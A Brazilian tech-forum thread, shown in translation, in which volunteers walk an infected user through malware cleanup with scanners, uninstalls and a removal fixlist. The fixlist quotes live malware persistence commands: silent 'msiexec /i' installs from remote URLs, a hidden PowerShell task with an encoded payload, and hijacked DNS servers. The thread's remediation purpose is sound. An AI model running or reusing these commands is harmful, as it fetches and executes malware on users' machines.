Hardware.com.br
TmfeijoMMonroe (Cyber Highlander, registered member; 13.7K posts, 4.2K likes)
#2 by TmfeijoMMonroe
22/03/2018 - 09:46
Good morning, esteemed thread author!

Run these assistants:

ESET Online Scanner, ticking all the options under advanced settings.
https://www.eset.com/br/antivirus-domestico/online-scanner/
Then the Malwarebytes family:
AdwCleaner: https://br.malwarebytes.com/adwcleaner/
JRT: https://www.bleepingcomputer.com/download/junkware-removal-tool/
And Malwarebytes itself.

Please post the logs.
joram (Highlander, registered member; 5.4K posts, 2.5K likes)
#3 by joram
22/03/2018 - 11:51
/_ Good morning! zebrao _\

Your machine shows a high volume of infections! In this case I recommend some uninstalls, so that we can proceed with a less bulky fixlist script that is, to some extent, less prone to errors.
You have 2 antivirus products installed, but the Security Center only lists AVG. So I recommend uninstalling Avast and keeping AVG.

> Uninstall (13 entries): try to uninstall as many as possible of the programs listed below.
> PS: You can use Revo Uninstaller in its Advanced Mode.

Reimage Repair (HKLM\...\Reimage Repair) (Version: 1.8.7.2 - Reimage) <==== ATENÇÃO
AlphaGo (HKLM-x32\...\{2C652C0A-EC71-4797-8077-F67649177AB0}) (Version: 1.0.2 - Default Company Name)
AlphaGo (HKLM-x32\...\{51639FCA-678F-4D71-8044-E16E3D49187F}) (Version: 1.0.7 - Default Company Name)
AlphaGo (HKLM-x32\...\{97D2FBF4-72CF-4DD6-8DA8-26710BC7BE71}) (Version: 1.1.0 - Default Company Name)
AlphaGo (HKLM-x32\...\{B20B3A3C-91E3-4326-8A0F-B3C012574F8C}) (Version: 1.1.2 - Default Company Name)
AlphaGo (HKLM-x32\...\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7}) (Version: 1.2.5 - AlphaGo)
amulesw (HKLM-x32\...\{7CC4BD9A-10F3-432B-A037-AE9FCE1F9B64}) (Version: 1.0.8 - amules)
Avast Free Antivirus (HKLM-x32\...\Avast Antivirus) (Version: 17.9.2322 - AVAST Software)
BikaQ Rss (HKLM-x32\...\{3678D164-84DB-4F73-AFD6-916342E10764}) (Version: 3.0.17 - BikaQ)
deskapp (HKLM-x32\...\{6AD06984-E21B-436F-9341-11053320B994}) (Version: 1.1.4 - deskapp)
FromDocToPDF Internet Explorer Homepage and New Tab (HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\FromDocToPDFTooltab Uninstall Internet Explorer) (Version: - Mindspark Interactive Network, Inc.)
SafeZone Stable 3.55.2393.607 (HKLM-x32\...\SafeZone 3.55.2393.607) (Version: 3.55.2393.607 - Avast Software) Hidden
WINSNARE (HKLM-x32\...\{56D19032-B59F-4020-994B-15912A49CD96}) (Version: 4.4.6 - WINSNARE)

> Download: < ZHPCleaner > ( ... by Nicolas Coolman )

> Or |Here!| << Mirror!

> If anything blocks the download, watch this tutorial posted on YouTube on how to disable Windows SmartScreen.
> Once on the page, click [image]

> Save it to the desktop! ( ZHPCleaner.exe )
> Disable your antivirus and run ZHPCleaner.exe <<

> Click "Eu".

> Click Scanner.

> Wait for it to finish!

> When it finishes, click Repair.
> PS: Ignore any alerts about your network configuration. (DNS)

> Tabs will appear in red, indicating problems to be repaired.
> Click Repair.

> When it finishes, click Report!
> Post the repair log: ~ Type : Repair

> Download: < RogueKiller_portable32 > ( ... by Adlice Software ) ( 32-bit version )

> Download: < RogueKiller_portable64 > ( ... by Adlice Software ) ( 64-bit version )

> Save it to the desktop!
> Close any open applications!
> Run RogueKiller_portable32.exe or RogueKiller_portable64.exe and accept the EULA.
http://www.adlice.com/thanks-downloading-roguekiller/

> Close this Adlice Software page, which opens in your browser.
> PS: If the IE browser's "SmartScreen Filter" blocks the anti-malware tool, click "More information".
> Then click: "Run anyway"

> Click the "SCAN" tab >> "Start Scan".
> Wait for it to finish!

> Click "Open Report" >> "Open TXT".
> Copy and post the report! (Mode: Scan)

[Regards]
TmfeijoMMonroe (Cyber Highlander, registered member; 13.7K posts, 4.2K likes)
#4 by TmfeijoMMonroe
22/03/2018 - 20:21
Good call, joram; uninstalling Avast. Dear author, follow my post #2 too.

Naldo Volpe said:
- In the beginning, many years ago, McAfee ran in MS-DOS mode and was very light and the best of the antiviruses; now it is very heavy and full
of useless stuff, just like Norton...
- I personally do not use any of these well-known ones:
. Norton
. McAfee
. Avast
. AVG
. Panda

- What I use is Microsoft's own, MSE
joram (Highlander, registered member; 5.4K posts, 2.5K likes)
#6 by joram
23/03/2018 - 03:33
/_ TmfeijoMMonroe & Komm _\

Since the Security Center did not show Avast as installed, I made this decision.
Komm said:
Since both antivirus products are from Avast and use the same engine, it makes no difference which one stays on the machine. Logically, the one that was not active was the one to go.

Regards.

Correct!

"fixlist"
start
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restrição <==== ATENÇÃO
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\Run: [background_fault] => C:\Users\Alberto\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) <==== ATENÇÃO
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xRTqcMUZWRkM8NTLWRTwyRWY1RTzQNTEyMWI8RWhQNH== /q <==== ATENÇÃO
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\MountPoints2: {0f6907b8-c1f0-11e6-b295-a11da8e2ef92} - G:\LaunchU3.exe -a
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\MountPoints2: {1e729a55-b5ac-11e6-8db6-a0f7b3479092} - F:\SETUP.EXE
HKLM\...\Providers\2lfq7cnq: C:\Program Files (x86)\Artatyvonas Server\local64spl.dll [309760 2017-02-10] () <==== ATENÇÃO
ShellExecuteHooks: Sem Nome - {E7869040-ECD1-11E6-AD72-64006A5CFC23} - -> Nenhum Arquivo
GroupPolicy: Restrição - Chrome <==== ATENÇÃO
Hosts: 0.0.0.0 csgob0t.online
Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178
Tcpip\..\Interfaces\{70A1E503-A1B0-4039-AF8D-CF8A10831A6F}: [NameServer] 82.163.143.176 82.163.142.178
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131419980414993468&GUID=2BFA0EDB-CCCC-4E4D-BA23-C102EAD4EF73
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131419980414993468&GUID=2BFA0EDB-CCCC-4E4D-BA23-C102EAD4EF73
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494332474&z=4c697805743c40d3fae48b5gaz9t1zbc9cfoez1m7z&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494332474&z=4c697805743c40d3fae48b5gaz9t1zbc9cfoez1m7z&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493208084&z=2248de917a32b1f216db889gcz6t8ccoee0b2eabbc&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617912&ResetID=131419980414993468&GUID=2BFA0EDB-CCCC-4E4D-BA23-C102EAD4EF73
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494332474&z=4c697805743c40d3fae48b5gaz9t1zbc9cfoez1m7z&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
HKU\S-1-5-21-3252762061-874905821-2166521-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493208084&z=2248de917a32b1f216db889gcz6t8ccoee0b2eabbc&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-3252762061-874905821-2166521-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493208084&z=2248de917a32b1f216db889gcz6t8ccoee0b2eabbc&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3252762061-874905821-2166521-1000 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={556BF2F8-8250-495E-9FD1-340CB13FBA87}&mid=0474ebf5ebbb47cf82155650b3207072-a1b23b70fa68d72b2434327a00be8c5aaf3de6c9&lang=pt-br&ds=AVG&coid=avgtbavg&cmpid=1117tb&pr=fr&d=2016-11-28 20:39:24&v=4.3.9.605&pid=wtu&sg=&sap=dsp&q={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.startpageing123.com/?type=sc&ts=1489487124&z=8dbb167110a3c976710ebf6g3z4bbt7z8b4m7g8o3c&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
FF ProfilePath: C:\Users\Alberto\AppData\Roaming\Firefox\Firefox\Profiles\upb62k2h.default [2017-07-10] <==== ATENÇÃO
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\40.3.8\\npsitesafety.dll [Nenhum Arquivo]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Nenhum Arquivo]
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.ourluckysites.com/?type=hp&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.mystarting123.com/search/index.php?z=274b78dc8a407ee05c95b7fgbz4taw3qboao2eaz4b&q={searchTerms}
CHR DefaultSearchKeyword: ChromeDefaultData -> mystarting123
CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2018-03-18] <==== ATENÇÃO
CHR HKU\S-1-5-21-3252762061-874905821-2166521-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [chfdnecihphmhljaaejmgoiahnihplgn] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
S2 3DM; C:\Users\Alberto\AppData\Local\3DM\Kitty.dll [754688 2017-04-20] () [Arquivo não assinado] <==== ATENÇÃO
S4 AMD; C:\Users\Alberto\AppData\Local\AMD\amd.exe [120320 2017-04-09] () [Arquivo não assinado] <==== ATENÇÃO
S2 CSHMDR; C:\Users\Alberto\AppData\Local\CSHMDR\Snare.dll [900096 2017-06-03] () [Arquivo não assinado] <==== ATENÇÃO
S4 glory; C:\Users\Alberto\AppData\Local\glory\glory.dll [809984 2017-06-12] () [Arquivo não assinado] <==== ATENÇÃO
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [9037680 2018-02-08] (Reimage®)
S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-13] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATENÇÃO
S4 WinSAPSvc; C:\Users\Alberto\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-06-10] () [Arquivo não assinado] <==== ATENÇÃO
U1 aswbdisk; não ImagePath
S1 onbckovf; \??\C:\Windows\system32\drivers\onbckovf.sys [X]
S1 p1487941280am; \??\C:\Users\Alberto\AppData\Local\Temp\bkA3D.tmp\p1487941280am.sys [X] <==== ATENÇÃO
S1 p1488241467am; \??\C:\Users\Alberto\AppData\Local\Temp\bk188F.tmp\p1488241467am.sys [X] <==== ATENÇÃO
S1 p1488381999am; \??\C:\Users\Alberto\AppData\Local\Temp\bkC5BF.tmp\p1488381999am.sys [X] <==== ATENÇÃO
S1 p1488537193am; \??\C:\Users\Alberto\AppData\Local\Temp\bk79C2.tmp\p1488537193am.sys [X] <==== ATENÇÃO
S1 p1488537241am; \??\C:\Users\Alberto\AppData\Local\Temp\bk360E.tmp\p1488537241am.sys [X] <==== ATENÇÃO
U2 snare; não ImagePath
U2 WinSnare; não ImagePath
2018-03-02 21:39 - 2018-03-18 11:47 - 000023364 _____ C:\Windows\System32\Tasks\{0E047847-0E7A-0B08-7811-0A050B7D1108}
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-4f15-0
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-2071-1
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-0df7-0
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-4f15-0
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-2071-1
2018-03-02 21:39 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-0df7-0
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-7bd5-1
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-26f3-0
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-7bd5-1
2018-03-02 21:39 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-26f3-0
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-46f5-1
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-2ad3-1
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-46f5-1
2018-03-02 21:38 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\f0e8babc-2ad3-1
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-14b7-0
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-0a91-0
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-14b7-0
2018-03-02 21:38 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-0a91-0
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{5e47109f-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{59db6f58-012c-1}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{2cc550cb-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\Users\Todos os Usuários\{0ab22f51-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{5e47109f-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{59db6f58-012c-1}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{2cc550cb-612c-0}
2018-03-02 21:38 - 2018-03-02 21:38 - 000000000 ____D C:\ProgramData\{0ab22f51-612c-0}
2018-01-21 20:41 - 2018-03-02 21:40 - 000000000 ____D C:\Users\Todos os Usuários\72808564
2018-01-21 20:41 - 2018-03-02 21:40 - 000000000 ____D C:\ProgramData\72808564
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-48c1-0
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\f0e8babc-3e51-1
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-48c1-0
2018-01-21 20:41 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\f0e8babc-3e51-1
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\{70825560-212c-0}
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\Users\Todos os Usuários\{2b9a3d0a-512c-1}
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\{70825560-212c-0}
2018-01-21 20:40 - 2018-03-02 21:39 - 000000000 ____D C:\ProgramData\{2b9a3d0a-512c-1}
2018-01-15 19:21 - 2018-01-15 19:21 - 000001841 _____ C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
2018-03-18 11:47 - 2017-06-03 13:21 - 000000000 ____D C:\Program Files\Babylon
2018-03-18 11:47 - 2017-03-26 21:12 - 000003446 _____ C:\Windows\System32\Tasks\Reimage Reminder
2018-03-18 11:47 - 2017-03-26 21:11 - 000004282 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-03-18 11:47 - 2017-03-23 08:17 - 000004174 _____ C:\Windows\System32\Tasks\Antivirus Emergency Update
2018-03-18 11:47 - 2017-02-10 20:37 - 000001996 _____ C:\Windows\System32\Tasks\FkOAq9gSbo
2018-03-03 20:18 - 2017-03-26 21:10 - 000000000 ____D C:\Users\Todos os Usuários\Reimage Protector
2018-03-03 20:18 - 2017-03-26 21:10 - 000000000 ____D C:\ProgramData\Reimage Protector
2018-02-26 09:17 - 2017-03-26 21:09 - 000000150 _____ C:\Windows\Reimage.ini
2018-02-16 15:20 - 2017-02-08 18:05 - 000002992 _____ C:\Windows\System32\Tasks\{871EF200-6F5B-4885-A34F-FDF0D1AAA370}
2018-02-16 15:20 - 2016-12-07 13:28 - 000002962 _____ C:\Windows\System32\Tasks\{F75B7A0E-CB4A-48FC-BFA8-0428742939DA}
2018-02-16 15:20 - 2016-12-07 13:28 - 000002962 _____ C:\Windows\System32\Tasks\{E8639AB9-3524-407F-B876-50078F8DD31A}
2018-02-16 15:20 - 2016-12-07 13:28 - 000002962 _____ C:\Windows\System32\Tasks\{22119429-0312-47F7-8AFF-61EC9F1D4C18}
2018-02-16 15:20 - 2016-11-28 18:39 - 000003186 _____ C:\Windows\System32\Tasks\{D2463716-0646-41A9-AA94-88EE59669D33}
2018-02-16 15:20 - 2016-11-28 16:52 - 000003140 _____ C:\Windows\System32\Tasks\{3148CD70-41D8-442B-8AC5-D820CF6D51FB}
2017-08-28 12:33 - 2017-08-28 12:33 - 020118528 _____ (Adobe Systems Incorporated) C:\Users\Alberto\AppData\Local\Temp\FlashPlayerUpdate.exe
2017-07-29 18:28 - 2018-01-15 19:20 - 014769392 _____ (Reimage) C:\Users\Alberto\AppData\Local\Temp\ReimagePackage.exe
2018-01-15 19:19 - 2018-01-15 19:19 - 000605376 _____ (Reimage) C:\Users\Alberto\AppData\Local\Temp\ReimageRepair.exe
2018-03-18 11:47 - 2017-07-23 06:02 - 000468488 _____ (Babylon Software Ltd.) C:\Users\Alberto\AppData\Local\Temp\uninstbb.exe
HKU\S-1-5-21-3252762061-874905821-2166521-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.) <==== ATENÇÃO
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ContextMenuHandlers1: [avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ContextMenuHandlers3: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2018-01-06] (AVAST Software)
Task: {08C34B56-F487-4C0E-90E0-ED464BDD8F78} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe
Task: {1424C6B0-E191-4B33-BB99-676485972781} - System32\Tasks\Reimage Reminder => C:\Program Files\Reimage\Reimage Repair\ReimageReminder.exe [2017-12-05] (Reimage ltd.) <==== ATENÇÃO
Task: {1DC9C17B-1CD1-4343-988E-06522CA10419} - \{0C7A0847-0C0C-097E-0A11-0F797A0E117D} -> Nenhum Arquivo <==== ATENÇÃO
Task: {3C1EDDF4-62E1-4E44-941D-48C1943476BC} - System32\Tasks\{0E047847-0E7A-0B08-7811-0A050B7D1108} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (a entrada de dados tem 9520 mais caracteres). <==== ATENÇÃO
Task: {42CDC4AE-023D-4EB7-AEDF-F39FF7FB33BD} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2018-01-06] (AVAST Software)
Task: {44E114DB-A92A-4CD3-9549-3E49EA9535EC} - System32\Tasks\One System Care Task => C:\PROGRA~2\ONESYS~1\SYSTEM~1.EXE <==== ATENÇÃO
Task: {517C44BD-C1DB-4FE6-95B7-89E4C3D29E09} - System32\Tasks\FkOAq9gSbo => C:\Program Files (x86)\2Dig1jJ6jw\updengine.exe <==== ATENÇÃO
Task: {6793D145-3A79-49FC-B870-51FC1C2AA1C6} - System32\Tasks\Tahophwovesp => msiexec /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST9500325AS_5VE73X59XXXX5VE73X59&v=2017210 /q <==== ATENÇÃO
Task: {6E199AE4-9123-4CAC-9E1E-E51A571C1FDF} - System32\Tasks\{D2463716-0646-41A9-AA94-88EE59669D33} => C:\Windows\system32\pcalua.exe -a C:\Users\Alberto\AppData\Local\Temp\dt_9188.tmp.exe -d "C:\Program Files\DAEMON Tools Lite" <==== ATENÇÃO
Task: {7E1C9183-9BEB-407B-8D1B-18BCFA1E125B} - System32\Tasks\Artatyvonas Server => C:\Program Files (x86)\Pluteward\qihick.exe [2017-02-10] (Glarysoft Ltd)
Task: {8447145B-706C-40D3-9D1B-A74D4C4463B9} - System32\Tasks\{3148CD70-41D8-442B-8AC5-D820CF6D51FB} => C:\Windows\system32\pcalua.exe -a C:\Users\Alberto\Desktop\IN2WLN48WW5.exe -d C:\Users\Alberto\Desktop
Task: {845C0333-2D19-44BF-A8B7-102035C32577} - System32\Tasks\15932452-3719-5A40-32B4-66F45C14D074 => C:\Windows\SysWOW64\regsvr32.exe /n /s /i:"/1049ca3fa785db4d /q" "C:\Users\Alberto\AppData\Local\CA10DB90-B716-55BF-5176-95045940D171\{25C1E671-6315-5741-E13D-D1EF03D4FE02}.."
Task: {89EE51D7-96B6-43BC-96CA-6C62DBD744E5} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe <==== ATENÇÃO
Task: {8C0583A0-5FA6-4476-969F-5B8171DD4874} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2018-02-08] (Reimage®) <==== ATENÇÃO
Task: {B37F0BD0-9D6D-4981-8294-CAB72EC032F5} - \{D82F247D-697A-4898-BCBA-E8F025619A6F} -> Nenhum Arquivo <==== ATENÇÃO
Task: {B53EA85D-352A-4C03-93ED-90244F4ABF80} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () <==== ATENÇÃO
Task: {B54D2A19-17D4-4EFD-B854-50BEDF0E035A} - System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel => C:\Program Files (x86)\BikaQRss\BikaQ.exe [2017-03-21] (IEC) <==== ATENÇÃO
Task: {B77F0830-148E-4694-9B09-E41A301A7FC2} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATENÇÃO
Task: {C7E14202-8FE5-4F62-B72A-82ED69580644} - System32\Tasks\{08643964-85D9-40D4-AB8E-C5CF637DF18B} => C:\Windows\system32\pcalua.exe -a D:\setup.exe -d D:\
Task: {C9717560-4E6D-4655-89EB-BCFCB7B0E2DC} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== ATENÇÃO
Task: {D96FBEBB-3B1B-430D-A611-2F357CBAC738} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2018-01-06] (AVAST Software)
Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Standuck\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\88ed70759ffebbd3\Google Chrome.lnk -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.)
Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.)
ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1491400621&z=f72d583771601bc5b5e36a4gcz8tag9z1e6e9qbg3o&from=che0812&uid=ST9500325AS_5VE73X59XXXX5VE73X59
ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\6f5a275e1b6271b6\Google Chrome.lnk -> C:\Program Files (x86)\Hotleaf\Application\chrome.exe (Google Inc.) -> --profile-directory=ChromeDefaultData
FirewallRules: [{6A649F0C-303E-4B6A-9519-45F5B5DD8E36}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{B1C40C66-E817-42DF-8471-320C8F612511}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{A60BF536-594A-4B86-BD61-A851D4D97C59}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
FirewallRules: [{6A783D8B-7E78-4D23-AF43-4E14A87CFF54}] => (Allow) C:\Program Files (x86)\MIO\loader\st9500325as_5ve73x59xxxx5ve73x59.exe
